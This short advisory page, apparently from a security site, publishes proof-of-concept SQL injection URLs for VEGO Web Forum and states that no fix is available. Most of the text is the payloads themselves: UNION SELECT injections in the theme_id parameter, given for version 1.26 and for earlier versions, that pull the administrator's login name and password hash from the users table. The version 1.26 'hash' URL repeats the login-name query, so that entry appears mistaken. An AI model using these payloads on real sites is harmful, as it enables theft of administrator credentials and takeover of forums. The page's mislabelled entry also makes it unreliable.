PoC/Exploit for SQL Injection Vulnerability in VEGO Web Forum

Published Proof of Concept code - SQL Injection Vulnerability in VEGO Web Forum.

Description
Available
Solution
Not available - check VEGO website

Administrator's login name.

For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4%20from%20vwf_users%20where%20userid=1/*

Hash of administrator's password.

For version 1.26:
http://hostname/webforum/index.php? theme_id=-1%20union%20select%201,2,name,4,5%20from%20vwf_users%20where%20userid=1/*

Earlier versions:
http://hostname/temp/_1/webforum/index.php? theme_id=-1%20union%20select%201,2,pass,4%20from%20vwf_users%20where%20userid=1/*

Order Source Code Audit

You may order PHP code review of your website made by our team.The work will be done by specialists in website security.

Advisories by vuln type